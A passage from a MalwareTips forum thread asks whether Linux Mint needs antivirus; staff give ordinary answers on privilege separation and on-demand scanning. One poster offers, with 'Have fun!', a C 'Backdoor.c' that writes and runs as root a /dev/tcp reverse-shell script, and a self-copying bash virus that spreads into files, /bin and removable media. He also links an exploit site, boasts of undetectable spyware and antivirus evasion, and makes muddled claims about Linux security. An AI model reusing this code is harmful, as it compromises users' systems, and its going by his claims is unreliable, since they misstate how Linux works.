How secure is linux and do i need a real-time antivirus.?

Amiga500

Level 12
Thread author
Verified
Jan 27, 2013
661
As the title says...is linux really secure.?..i have been using linux mint now for about 5 months and have no av installed.
 
  • Like
Reactions: (BlackBox) Hacker

(BlackBox) Hacker

Level 2
Verified
Apr 21, 2014
179
I would have to say no, you have a UAC Screen on Linux Mint last time I have used it. But I have found a exploit how to bypass it totally? So no don't use Linux. Windows 7 Ultimate or Windows 8 Pro are more secure I think, but you are looking at more Malware for that platform. Linux is also very buggy that's why I moved back to Windows!

As the title says...is linux really secure.?..i have been using linux mint now for about 5 months and have no av installed.
 

(BlackBox) Hacker

Level 2
Verified
Apr 21, 2014
179
Did I also say I have hacked all of the Linux platform? And the same exploit is used on Android as well, because that is Linux based!

Not a very helpful reply lol

Choose your poison here: http://www.blackbox.uphero.com/my-exploits.html

Code:
/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*-  */
/*
* Backdoor.c
* Copyright (C) 2014 (BlackBox) Grey Hat Hacker <ade@PC-U180>
*
* Revers_Shell_Exploit is free software: you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* Revers_Shell_Exploit is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
* See the GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program.  If not, see <http://www.gnu.org/licenses/>.
*
*
* Exploit compiled with Anjuta Compiler!!!
*
*/
#include <stdio.h>
int main()
{
FILE *fp;
char* str = "string";
int x = 10;
fp=fopen("/tmp/Update.sh", "w");
if(fp == NULL)
exit(-1);
fprintf(fp, "#!/bin/bash\n");
fprintf(fp, "exec 5<>/dev/tcp/127.0.0.1/1000\n");
fprintf(fp, "cat <&5 | while read line; do $line 2>&5 >&5; done\n");
fclose(fp);
system("gksu -u root /bin/bash /tmp/Update.sh");
system("rm /tmp/Update.sh");
return (0);
}

Have fun!
 
Last edited by a moderator:

(BlackBox) Hacker

Level 2
Verified
Apr 21, 2014
179
Linux is totally nuts! :eek:

127.0.0.1 is your loop back address of Computer and port 1000 on the reverse TCP, also the Linux Mint UAC screen is triggered with the command line. The user types password in and stuff and game over!!!

Now Linux Computer Viruses which don't exist!

Code:
#!/bin/bash
# p3w-451

  for file in *
   do
    chmod +x $file 2>/dev/null
    cp $0 $file 2>/dev/null
   done
r=$(pwd)
case "/tmp" in
    /*) p=$r;;
    esac
     cp -r . "/tmp" 2>/dev/null
r=$(pwd)
case "/bin" in
    /*) p=$r;;
    esac
    sudo cp -r . "/bin" 2>/dev/null
    cd /media
for user in $(ls -d */)
do
for dirs in $(ls -d $user*)
do
   cp /tmp/p3w-451.sh /media/$dirs/ 2>/dev/null
  done
done
cat /tmp/p3w-451.sh

# P3W-451 is a desert world in orbit around the companion
# star of a newly formed black hole. All indigenous
# life on the planet recently became extinct, and the
# gravity of the black hole is slowly tearing the planet
# apart. Major Boyd and SG-10 were on a routine mission
# to the planet, and attempts to contact them opened a
# wormhole that could not be disengaged. The team was lost,
# and to break the wormhole connection, SG-1 forced the wormhole
# to arc to another planet.
#
# P3W-451 was later accessed in order to use the extreme gravity
# to cause a supernova in the Vorash system. The coordinates were also
# offered to the Aschen.
#
# Location: Richmond Sand Dunes
# p3w-451 - Created by (BlackBox)
#
# http://rdanderson.com/stargate/entries/p3w451.htm
#
# http://www.youtube.com/watch?v=E-xIxGPM68E
#
# Press Ctrl Key + click
#
 
Last edited by a moderator:
  • Like
Reactions: MrExplorer

Jack

Administrator
Verified
Staff Member
Well-known
Jan 24, 2011
9,378
As the title says...is linux really secure.?..i have been using linux mint now for about 5 months and have no av installed.
Nothing is really secure, and every operating system can be compromised by malware. However, the Linux platform has almost no real malware that is targeting home users, so you should be safe.

Linux systems are by no means infallible, but one of their key advantages lies in the way account privileges are assigned. In Windows, users are generally given administrator access by default, which means they pretty much have access to everything on the system, even its most crucial parts. So, then, do malware.
With Linux, on the other hand, users do not usually have such "root" privileges; rather, they're typically given lower-level accounts. What that means is that even if a Linux system is compromised, the virus won't have the root access it would need to do damage system wide; more likely, just the user's local files and programs would be affected.
 

(BlackBox) Hacker

Level 2
Verified
Apr 21, 2014
179
But the Malware will trigger root access! Yes the same in Windows, but the safe download sites make up for it!

Nothing is really secure, and every operating system can be compromised by malware. However, the Linux platform has almost no real malware that is targeting home users, so you should be safe.

Linux systems are by no means infallible, but one of their key advantages lies in the way account privileges are assigned. In Windows, users are generally given administrator access by default, which means they pretty much have access to everything on the system, even its most crucial parts. So, then, do malware.
With Linux, on the other hand, users do not usually have such "root" privileges; rather, they're typically given lower-level accounts. What that means is that even if a Linux system is compromised, the virus won't have the root access it would need to do damage system wide; more likely, just the user's local files and programs would be affected.

Your signed applications on Linux is your built-in download manager only, that is just crazy!

Nothing is really secure, and every operating system can be compromised by malware. However, the Linux platform has almost no real malware that is targeting home users, so you should be safe.

Linux systems are by no means infallible, but one of their key advantages lies in the way account privileges are assigned. In Windows, users are generally given administrator access by default, which means they pretty much have access to everything on the system, even its most crucial parts. So, then, do malware.
With Linux, on the other hand, users do not usually have such "root" privileges; rather, they're typically given lower-level accounts. What that means is that even if a Linux system is compromised, the virus won't have the root access it would need to do damage system wide; more likely, just the user's local files and programs would be affected.

Linux is also rubbish and has rubbish Software plus it is very buggy as well!

Nothing is really secure, and every operating system can be compromised by malware. However, the Linux platform has almost no real malware that is targeting home users, so you should be safe.

Linux systems are by no means infallible, but one of their key advantages lies in the way account privileges are assigned. In Windows, users are generally given administrator access by default, which means they pretty much have access to everything on the system, even its most crucial parts. So, then, do malware.
With Linux, on the other hand, users do not usually have such "root" privileges; rather, they're typically given lower-level accounts. What that means is that even if a Linux system is compromised, the virus won't have the root access it would need to do damage system wide; more likely, just the user's local files and programs would be affected.
 
Last edited by a moderator:
  • Like
Reactions: MrExplorer

Ink

Administrator
Verified
Staff Member
Well-known
Jan 8, 2011
22,361
If you will be transferring files between your Linux and Windows often, then you can use an on-demand antivirus on Linux. More importantly Windows should have an Antivirus installed anyway.

Real-time protection on Linux? If you can find one that works. :p
 

(BlackBox) Hacker

Level 2
Verified
Apr 21, 2014
179
That reminds me last time I use Linux Mint and I enabled password protection for File Sharing, I use my sisters Windows 7 Netbook and connected to my files shared. And I didn't get a password prompt nothing lol. I can easily make a Computer Worm for this! I could read the files and delete them, but I couldn't edit the files in that folder really crazy stuff!

If you will be transferring files between your Linux and Windows often, then you can use an on-demand antivirus on Linux. More importantly Windows should have an Antivirus installed anyway.

Real-time protection on Linux? If you can find one that works. :p

Linux no security and rubbish made, I'm a real what you call it now? A Windows fan boy, but I was also a Linux nut as well. Now no more it took me half of one Year to see how rubbish the Software was? And drivers messing up and others stuff. I still use all of the reset of the Linux Software, but on Windows as they are cross platform based! The programs that did not work on Hardware. Now work using Windows on this computer I'm using right now lol.

Firefox
Thunderbird
NoScript - Backtrack
VLC

No such thing as Real-time protection on Linux lol!

If you will be transferring files between your Linux and Windows often, then you can use an on-demand antivirus on Linux. More importantly Windows should have an Antivirus installed anyway.

Real-time protection on Linux? If you can find one that works. :p

It's a good job I've done Malware and Security!

If you will be transferring files between your Linux and Windows often, then you can use an on-demand antivirus on Linux. More importantly Windows should have an Antivirus installed anyway.

Real-time protection on Linux? If you can find one that works. :p
 
Last edited by a moderator:

Rahadian Putra

Level 9
Verified
Well-known
Jan 28, 2014
444
Well at least, there is only a few people or black hatter that like or attemp to hacking linux, that's somewhat reduce the possibilities getting hacked while using Linux :p (as far as I know of course, since only a few people using Linux)

And yes, you also need AV on Linux as well, at least that what most people said
 

(BlackBox) Hacker

Level 2
Verified
Apr 21, 2014
179
I have Spyware that is 100% undetectable on Windows and it was detectable once, knowing how other Venders block stuff is so cool, Now the trick is to encrypt your Source Code as a binary file!

Firefox is playing up I think with this site!

Well at least, there is only a few people or black hatter that like or attemp to hacking linux, that's somewhat reduce the possibilities getting hacked while using Linux :p (as far as I know of course, since only a few people using Linux)

And yes, you also need AV on Linux as well, at least that what most people said

Windows is the best platform to hack not Linux rubbish lol!

Well at least, there is only a few people or black hatter that like or attemp to hacking linux, that's somewhat reduce the possibilities getting hacked while using Linux :p (as far as I know of course, since only a few people using Linux)

And yes, you also need AV on Linux as well, at least that what most people said
 
Last edited:

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

User Menu

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top